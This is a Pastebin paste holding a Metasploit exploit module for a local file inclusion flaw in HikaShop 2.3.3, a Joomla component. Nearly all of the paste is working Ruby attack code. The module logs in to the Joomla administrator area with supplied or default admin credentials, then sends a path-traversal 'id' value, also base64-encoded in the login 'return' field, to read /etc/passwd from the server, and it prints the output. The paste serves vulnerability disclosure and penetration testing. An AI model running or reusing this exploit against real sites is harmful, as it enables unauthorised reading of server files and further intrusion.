SHARE
TWEET

HikaShop LFI msf module

a guest Jan 3rd, 2015 245 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. ##
  3. # This module requires Metasploit: http//metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
  7. require 'msf/core'
  8.  
  9. class Metasploit4 < Msf::Exploit::Remote
  10.   Rank = ExcellentRanking
  11.  
  12.   include Msf::Exploit::Remote::HttpClient
  13.  
  14.   def initialize(info = {})
  15.     super(update_info(info,
  16.       'Name' => 'HikaShop - LFI poc for authenticated users',
  17.         'Description' => %q{
  18.                 HikaShop 2.3.3 is vulnerable to local file include attack.
  19.                 Authenticated user can read local files from the server.
  20.  
  21.                 Vulnerability was described on https://twitter.com/HauntITBlog
  22.       },
  23.       'Author' =>
  24.         [
  25.           'HauntIT Blog', # Discovery / msf module
  26.           'http://hauntit.blogspot.com'
  27.         ],
  28.       'License' => MSF_LICENSE,
  29.       'Privileged' => false,
  30.       'Platform'   => ['php'],
  31.       'Arch'       => ARCH_PHP,
  32.       'Targets' =>
  33.         [
  34.           [ 'Automatic', { } ],
  35.         ],
  36.       'DefaultTarget'  => 0,
  37.       'DisclosureDate' => '03.01.2015'))
  38.       register_options(
  39.       [
  40.         OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
  41.         OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
  42.         OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
  43.         OptRegexp.new('FAILPATTERN', [ false, 'Pattern returned in response if login failed', '/error/'] ),
  44.       ], self.class)
  45.     end
  46.  
  47.   def check
  48.   end
  49.  
  50.   def fetchMd5(my_string)
  51.     if my_string  =~ /([0-9a-fA-F]{32})/
  52.       return $1
  53.     end
  54.     return nil
  55.   end
  56.  
  57.  
  58.   def exploit
  59.     # 1st, we will get cookies and token
  60.     req1 = send_request_cgi({
  61.         'method'        => 'GET',
  62.         'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
  63.     })
  64.     cookies = req1['set-cookie']
  65.     if not req1
  66.       fail_with("[-] Failed with 1st request")
  67.     end
  68.  
  69.     print_status("[+] Resp code: " + req1.code.to_s)
  70.     print_good("[+] Cookie(s) : " + cookies)
  71.  
  72.     token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
  73.    if req1.body =~ token_pattern
  74.      token = fetchMd5(req1.body)
  75.      print_good("[+] Token : "+ token.to_s)
  76.    else
  77.      print_status("[-] Token not found")
  78.    end
  79.  
  80.  
  81.    # now we need to do auth using that token and cookies
  82.    print_status("[+] 2nd request (post with auth)")
  83.  
  84.    auth = send_request_cgi({
  85.        'method'        => 'POST',
  86.        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
  87.        'cookie'        => cookies,
  88.        'vars_post'     => {
  89.                'username'      => datastore['USERNAME'],
  90.                'passwd'        => datastore['PASSWORD'],
  91.                'option'        => 'com_login',
  92.                'task'          => 'login',
  93.                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21faGlrYXNob3AmY3RybD12aWV3JnRhc2s9ZWRpdCZpZD0wfGJlZXozfGNvbXBvbmVudHxjb21faGlrYXNob3B8YWRkcmVzc3wuLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
  94.                token.to_s => 1
  95.      }
  96.    })
  97.  
  98.    print_good("[+] Code after auth: " + auth.code.to_s)
  99.  
  100.  
  101.    # 3rd step: get + post params to lfi
  102.    print_status('[+] and now 3rd request...')
  103.    xpl = send_request_cgi({
  104.        'method'        => 'GET',
  105.        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
  106.        'vars_get'      => {
  107.                 'option'   => 'com_hikashop',
  108.                 'ctrl'  => 'view',
  109.                 'task'  => 'edit',
  110.                 'id'    => '0|beez3|component|com_hikashop|address|../../../../../../../../../../../../../../../../../../etc/passwd'
  111.        },
  112.        'cookie'        => cookies
  113.    })
  114.  
  115.    if xpl
  116.      print_good("[+] 3rd response code: " + xpl.code.to_s)
  117.      print_good("[+] 3rd (full) response body:")
  118.      print_status(xpl.body)
  119.    else
  120.      fail_with("[-] Cannot exploit it :C")
  121.    end
  122.  end # exploit
  123.  
  124. end
RAW Paste Data
Top